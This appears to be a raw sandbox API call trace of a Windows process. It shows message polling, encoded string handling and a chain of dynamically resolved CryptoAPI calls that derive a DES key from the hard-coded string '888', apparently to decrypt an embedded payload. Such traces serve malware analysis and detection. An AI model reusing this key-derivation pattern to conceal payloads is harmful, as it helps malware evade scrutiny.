[0224.200] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0224.200] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0224.200] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0224.200] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0224.200] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0224.200] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0224.200] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0224.200] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0224.200] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0224.200] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0224.200] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0224.200] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0224.200] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0224.200] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0224.200] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0224.200] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0224.200] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0224.201] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0224.201] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0224.201] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0224.201] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0224.201] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.201] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0224.201] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.201] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.201] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.201] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.201] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.201] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.201] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.201] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0224.201] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0224.201] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0224.201] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0224.201] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0224.201] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0224.201] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0224.201] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0224.201] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0224.202] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0224.202] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0224.202] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0224.202] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0224.202] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0224.202] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0224.202] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0224.202] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0224.202] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0224.202] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0224.202] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.202] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.202] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0224.202] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0224.202] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0224.202] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0224.202] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0224.202] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0224.202] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0224.202] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0224.202] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0224.203] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0224.203] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0224.203] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0224.203] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aab860, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0224.203] CryptCreateHash (in: hProv=0xa7c550, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0224.203] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.203] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.203] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.203] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.203] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0224.203] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71d18, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0224.203] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0224.203] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.203] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0224.203] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71bb8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0224.203] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.203] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0224.203] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0224.203] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0224.203] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0224.203] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0224.204] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0224.204] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0224.204] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aab908, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0224.204] CryptHashData (hHash=0x9e1cb8, pbData=0x2a71c58, dwDataLen=0x3, dwFlags=0x1) returned 1 [0224.204] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.204] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.204] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.204] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0224.204] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0224.204] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0224.204] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0224.204] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0224.204] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0224.204] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0224.204] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0224.204] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0224.204] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0224.204] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0224.204] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0224.204] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aab8c0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0224.204] CryptDeriveKey (in: hProv=0xa7c550, Algid=0x6601, hBaseData=0x9e1cb8, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e2138) returned 1 [0224.205] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.205] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.205] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.205] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.205] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.205] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.205] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0224.205] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0224.205] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0224.205] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0224.205] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0224.205] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0224.205] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0224.205] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f71a0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0224.205] CryptDestroyHash (hHash=0x9e1cb8) returned 1 [0224.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x3865d30 [0224.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cf8 [0224.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71be8 [0224.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0224.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0224.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7d0 [0224.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d78 [0224.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7d0 | out: hHeap=0x2af0000) returned 1 [0224.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0224.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0224.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab800 [0224.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0224.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0224.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d28 [0224.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0224.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0224.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0224.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0224.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0224.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0224.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0224.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0224.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab878 | out: hHeap=0x2af0000) returned 1 [0224.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7e8 | out: hHeap=0x2af0000) returned 1 [0224.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8a8 | out: hHeap=0x2af0000) returned 1 [0224.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0224.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab908 | out: hHeap=0x2af0000) returned 1 [0224.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba28 | out: hHeap=0x2af0000) returned 1 [0224.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0224.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0224.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0224.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab800 | out: hHeap=0x2af0000) returned 1 [0224.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0224.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0224.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3865d30 | out: hHeap=0x2af0000) returned 1 [0224.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6b0 | out: hHeap=0x2af0000) returned 1 [0224.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0224.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0224.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0224.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0224.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6c8 | out: hHeap=0x2af0000) returned 1 [0224.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0224.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0224.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0224.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0224.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0224.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0224.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0224.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8f0 | out: hHeap=0x2af0000) returned 1 [0224.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0224.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0224.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7b8 | out: hHeap=0x2af0000) returned 1 [0224.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0224.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab860 | out: hHeap=0x2af0000) returned 1 [0224.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba10 | out: hHeap=0x2af0000) returned 1 [0224.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0224.209] 